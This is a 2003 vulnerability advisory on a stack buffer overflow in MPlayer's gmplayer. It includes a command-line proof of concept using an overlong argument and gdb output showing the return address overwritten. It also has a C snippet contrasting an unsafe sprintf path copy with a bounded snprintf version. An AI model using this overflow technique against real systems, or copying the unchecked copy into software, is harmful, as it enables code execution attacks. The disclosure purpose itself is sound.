
Stack Buffer Overflow in MPlayer




-------------------------------------------------

No System Group - Advisory #2 - 01/09/03

-------------------------------------------------

Program:  MPlayer - The Movie Player for Linux 

Homepage:  http://www.mplayerhq.hu

Vulnerable Versions: Mplayer v0.91 and prior

Risk: Low / Medium

Impact: Stack Buffer Overflow

-------------------------------------------------





- DESCRIPTION

-------------------------------------------------

MPlayer is a movie player for LINUX (runs on many

other Unices, and non-x86 CPUs, see the documentation).

It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV,

QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA

files, supported by many native, XAnim, and Win32 DLL codecs.



More information at: http://www.mplayerhq.hu





- DETAILS

-------------------------------------------------

bash-2.05b$ gmplayer `perl -e 'print "A" x 550'`

Using GNU internationalization

Original domain: messages

Original dirname: /usr/share/locale

Current domain: mplayer

Current dirname: /usr/local/share/locale



Playing

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

File not found:

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'



MPlayer interrupted by signal 11 in module: unknown

- MPlayer crashed by bad usage of CPU/FPU/RAM.

  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and

  disassembly. For details, see DOCS/bugreports.html#crash.b.

- MPlayer crashed. This shouldn't happen.

  It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc

  version. If you think it's MPlayer's fault, please read DOCS/bugreports.html

  and follow the instructions there. We can't and won't help unless you provide

  this information when reporting a possible bug.



Now we proceed to open gdb to view what may have occurred.



$gdb gmplayer

GNU gdb 5.3

Copyright 2002 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...

(no debugging symbols found)...

(gdb) r `perl -e 'print "A" x 550'`

Starting program: /usr/local/bin/gmplayer ` perl -e 'print "A" x 550'`

(no debugging symbols found)...(no debugging symbols found)...

(no debugging symbols found)...[New Thread 16384 (LWP 2044)]

Using GNU internationalization

Original domain: messages

Original dirname: /usr/share/locale

Current domain: mplayer

Current dirname: /usr/local/share/locale



MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS)



Playing

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

File not found:

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'



Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread 16384 (LWP 2044)]

0x41414141 in ?? ()

(gdb) i r ebp eip esp

ebp            0x41414141       0x41414141

eip            0x41414141       0x41414141

esp            0xbfffd0b0       0xbfffd0b0

(gdb) 



Tested in Slackware Linux 9.0



NOTE: The program 'gmplayer' isn't SUID by default.
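The crash above is produced by a filename argument longer than the fixed-size buffer it is copied into, which is why ebp and eip end up as 0x41414141. As an added illustration, not MPlayer's source (the advisory does not identify the affected function), the following C shows the unbounded-copy pattern beside a bounded form that rejects an overlong argument instead of writing past the buffer; the /home/coki working directory and the 256-byte buffer size are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256   /* assumed buffer size, smaller than the 550-byte argument */

/* Unsafe pattern (hypothetical, not MPlayer's code): format into a fixed
 * buffer with no length check. A name longer than the buffer overwrites
 * the saved frame pointer and return address, as ebp/eip = 0x41414141
 * shows above. Only ever called with a short name in this example. */
void build_path_unsafe(char *out, const char *cwd, const char *name)
{
    sprintf(out, "%s/%s", cwd, name);
}

/* Hardened form: snprintf returns the length it would have needed, so
 * truncation is detected and treated as an error instead of silently
 * proceeding with a mangled path. Returns bytes written, or -1. */
int build_path_safe(char *out, size_t outsz, const char *cwd, const char *name)
{
    int n = snprintf(out, outsz, "%s/%s", cwd, name);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* Demo helper: a name of `len` 'A' bytes, like perl -e 'print "A" x 550',
 * joined to the advisory's working directory (assumed to be /home/coki). */
int demo_safe_result(size_t len)
{
    char buf[PATH_BUF];
    char *name = malloc(len + 1);
    if (!name) return -2;
    memset(name, 'A', len);
    name[len] = '\0';
    int r = build_path_safe(buf, sizeof buf, "/home/coki", name);
    free(name);
    return r;
}

/* Demo helper: 1 if the bounded builder yields exactly `expected`, else 0. */
int demo_safe_path_matches(const char *name, const char *expected)
{
    char buf[PATH_BUF];
    if (build_path_safe(buf, sizeof buf, "/home/coki", name) < 0) return 0;
    return strcmp(buf, expected) == 0;
}
```

With a 550-byte name the bounded builder returns -1 and leaves an empty string, where the unbounded one would have corrupted the stack.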





- SOLUTIONS

-------------------------------------------------

Update the program to the latest version.





- REFERENCES

-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-02.txt





- CREDITS

-------------------------------------------------

Discovered by CoKi <coki@interlap.com.ar>



No System Group - http://www.nosystem.com.ar
